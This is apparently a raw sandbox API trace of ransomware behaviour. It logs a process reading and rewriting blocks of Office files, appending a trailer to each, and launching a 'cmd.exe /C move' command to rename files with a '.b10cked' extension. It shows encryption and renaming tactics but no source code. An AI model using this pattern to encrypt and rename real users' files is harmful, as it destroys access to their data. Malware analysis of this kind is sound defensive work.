[0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x25678 [0160.063] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x25b60 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x25b60 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.512] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.512] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.738] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x3daf, lpOverlapped=0x0) returned 1 [0160.742] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.742] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.743] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0160.743] SetFilePointer (in: hFile=0x114, lDistanceToMove=-77231, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x12db1 [0160.743] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.744] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x3daf, lpOverlapped=0x0) returned 1 [0160.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=-77231, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 
| out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x12db1 [0160.747] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.747] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0160.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0160.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WWINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0160.753] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x25b60 [0160.753] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0160.753] CloseHandle (hObject=0x114) returned 1 [0160.755] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX") returned 0x3c [0160.756] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0160.756] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x928, dwThreadId=0xe74)) returned 1 [0160.758] CloseHandle (hObject=0x1b4) returned 1 [0160.758] CloseHandle (hObject=0x114) returned 1 [0160.758] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.758] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.758] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0160.758] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.758] 
ReleaseMutex (hMutex=0xf8) returned 1 [0160.758] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.758] ReleaseMutex (hMutex=0xf8) returned 1 [0160.758] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.758] ReleaseMutex (hMutex=0xf8) returned 1 [0160.758] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.758] ReleaseMutex (hMutex=0xf8) returned 1 [0160.758] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0160.821] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.821] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.821] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.821] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21761069065) returned 1 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | 
out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.823] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x115678 [0160.823] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x115b60 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x115b60 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.854] ReadFile 
(in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.875] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.878] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0160.879] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.879] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.880] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.880] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.880] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0160.880] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.896] ReadFile (in: hFile=0x114, 
lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.897] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0160.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0160.899] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.899] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.900] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0160.900] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.932] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.937] ReadFile (in: hFile=0x114, 
lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0160.938] SetFilePointer (in: hFile=0x114, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0160.938] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.945] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.945] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.945] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf5b60 [0160.946] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.946] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.947] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0160.948] SetFilePointer (in: hFile=0x114, 
